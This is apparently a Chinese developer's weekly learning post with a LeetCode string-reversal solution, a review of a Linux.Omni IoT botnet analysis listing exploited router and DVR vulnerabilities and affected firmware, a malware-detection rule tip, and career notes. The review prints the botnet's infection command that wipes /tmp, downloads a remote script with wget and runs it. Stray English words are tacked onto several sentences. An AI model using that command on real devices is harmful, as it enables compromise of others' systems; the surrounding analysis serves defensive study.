【ARTS】01_06_左耳聽風-20181217~1223

ARTS:

  • Algrothm: leetcode算法題目
  • Review: 閱讀而且點評一篇英文技術文章
  • Tip/Techni: 學習一個技術技巧
  • Share: 分享一篇有觀點和思考的技術文章

Algorithm

【leetcode】Reverse String

https://leetcode.com/problems/reverse-string/html

1)problem

編寫一個以字符串做爲輸入並逆轉字符串的函數。linux

2)answer

字符串大於0,就從最末尾開始取值。ios

3)solution

#include "pch.h"
#include <stdio.h>
#include <string>
#include <iostream>
#include <algorithm>
using std::string;


class Solution {
public:
    string reverseString(string s) {

        string result = "";
        for (int i =s.length()-1;i>=0 ; i--)
        {
            result += s.at(i);
        }

        return result;

    }
};

int main()
{
    // 使用內容
    Solution nSolution;
    nSolution.reverseString("abcdef");
}

Review

【漏洞挖掘】Linux.Omni IoT 僵屍網絡惡意軟件分析

1)場景

Linux下針對IoT威脅的分類和分析。算法

2)問題難點

使用什麼方式對IOT設備進行攻擊。安全

3)解決問題的方法

Linux.Omni因其感染庫包含了許多漏洞(總共11種)bash

4)方法細節

利用的IoT設備漏洞cookie

  • Vacron

VACRON網絡錄像機中"board.cgi"參數存在代碼注入的漏洞。網絡

img

  • Netgear – CVE-2016-6277

經過對路由器「cgi-bin/」目錄進行GET請求而進行的遠程代碼執行攻擊。函數

img

  • D-Link – OS-Command Injection via UPnP

IoTReaper使用的是hedwig.cgi參數cookie溢出的漏洞,Omni使用的則是UPnP端口漏洞。工具

Omni的POST請求以下:

img

咱們能夠找到對應的二進制命令:

img

存在漏洞的固件版本是:
DIR-300 rev B – 2.14b01,
DIR-600 – 2.16b01,
DIR-645 – 1.04b01,
DIR-845 – 1.01b02,
DIR-865 – 1.05b03。

  • CCTV-DVR

與「/language/Swedish」資源相關聯,容許遠程執行代碼。

img

  • D-Link – HNAP

經過CAPTCHA繞過登陸,並容許外部攻擊者執行遠程代碼。

img

D-Link路由器有此漏洞的版本:

DI-524 C1 3.23,
DIR-628 B2 1.20NA1.22NA,
DIR-655 A1 1.30EA

  • TR-069 – SOAP

漏洞利用以下:

img

二進制中的指令:

img

  • Huawei Router HG532 – Arbitrary Command Execution

在華爲HG532路由器中,能夠經過修改HTTP請求來利用配置文件驗證錯誤的漏洞。

img

此漏洞已在分析Okiru/Satori僵屍網絡的文章中(Analysis of Linux.Okiru)被檢測及分析。

  • Netgear – Setup.cgi RCE

Netgear路由器DGN1000 1.1.00.48固件中存在容許遠程執行代碼而無需事先驗證的漏洞。

img

  • Realtek SDK

使用Realtek SDK和miniigd守護程序的不一樣設備都存在經過UPnP SOAP接口的命令注入漏洞。

img

  • GPON

GPON路由器的最新漏洞

img

5)總結

儘管攻擊方式多種多樣, 在受感染設備上運行的命令是一致的:

cd /tmp;rm -rf *;wget http://%s/{marcaDispositivo};sh /tmp/{marcaDispositivo}

下載的文件是bash腳本,它依據受感染設備的不一樣構架來下載樣本。

img

Tip

【安全開發】惡意代碼檢查工具1

1)場景

網絡安全設備報警,某臺機器中毒。

2)問題難點

如何快速找到機器裏的惡意代碼相關進程、文件。

3)解決思路

經過搜索國內外惡意代碼公開的分析報告,分析樣本,提取行爲特徵。

4)方法細節

逆向分析收集到的樣本,而後提取規則:

文件規則:文件路徑、Yara規則

註冊表:註冊表路徑、子項、類型、值

內存:內存特徵碼、內存類型、內存保護屬性、內存塊大小範圍

遍歷內存代碼:

【惡意代碼】惡意代碼代碼特徵提取
https://www.cnblogs.com//17bdw/p/10181207.html

5)總結

只須要搞懂兩個知識點:VirtualQueryEx使用、MEMORY_BASIC_INFORMATION 結構體中RegionSize字段的含義。

Share

【業務能力】極客時間-左耳聽風-開篇詞1

1)場景

利用技術變現思路。

2)問題難點

在長時間加班狀況下,如何保持學習。

3)解決思路

以爲仍是要從頭至尾看完一本書,不容易被分神。
白天工做回家就不想動了。

4)方法細節

【技術思路】極客時間-左耳聽風-開篇詞1
http://www.javashuo.com/article/p-pbmkicar-gp.html

5)總結

用技術變現:

獨立思考
保持學習力、洞察力
尋找合適的環境
具有動手能力。
關注技術付費點
善於提高經驗
輸出價值觀
朋友圈
擁有技術領導力
相關文章
相關標籤/搜索